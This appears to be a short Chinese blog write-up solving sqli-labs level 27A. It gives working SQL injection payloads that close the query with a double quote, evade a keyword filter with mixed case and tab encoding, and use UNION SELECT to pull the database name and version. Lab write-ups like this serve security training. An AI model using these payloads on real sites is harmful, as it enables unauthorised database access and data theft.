sqllab第二十七A关通关笔记

I_WORM2024-03-20 20:00

知识点:

  • 双引号闭合
  • union select 大小写绕过
    • Union Select
  • 这里不能进行错误注入,无回显

经过测试发现这是一个双引号闭合

构造payload:id=1"%09and%091="1

页面成功回显

构造payload:id=0"%09uNion%09SElect%091,2,3%09"1

页面成功回显除了输入内容

获取数据库名和版本信息

构造payload:id=0"%09uNion%09SElect%091,database(),version()%09"1

成功获取了数据库名和版本信息

10

相关推荐
没头脑的男大8 分钟前
零碎的嵌入式笔记2
笔记
小龙24 分钟前
图卷积神经网络(GCN)学习笔记
笔记·学习·cnn·gcn·图卷积神经网络·理论知识
淮北也生橘125 小时前
Linux的V4L2视频框架学习笔记
linux·笔记·学习·音视频·嵌入式linux
ZZHow10246 小时前
微信小程序开发笔记(01_小程序基础与配置文件)
笔记·微信小程序·小程序
凯尔萨厮7 小时前
Java学习笔记四(继承)
java·笔记·学习
ホロHoro7 小时前
学习笔记:Javascript(5)——事件监听(用户交互)
javascript·笔记·学习
黎宇幻生13 小时前
Java全栈学习笔记33
java·笔记·学习
朗迹 - 张伟14 小时前
Golang安装笔记
开发语言·笔记·golang
siy233317 小时前
[c语言日记] 数组的一种死法和两种用法
c语言·开发语言·笔记·学习·链表
不会聊天真君6471 天前
ES(springcloud笔记第五期)
笔记·elasticsearch·spring cloud
热门推荐
01conda中设置镜像地址(附所有可换的地址)02UV安装并设置国内源03保姆级教程:手把手教你用Dify实现完美多轮对话(附Chatflow和提示词)04A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程05UV 工具安装与国内镜像源配置指南06GitHub 镜像站点07突破百度网盘的下载限速,两种方法教会你【超详细】08KGG转MP3工具|非KGM文件|解密音频09教你如何认证 Gemini 教育优惠的二次验证,薅个 1年的 Gemini Pro 会员1046个Nano-banana 精选提示词,持续更新中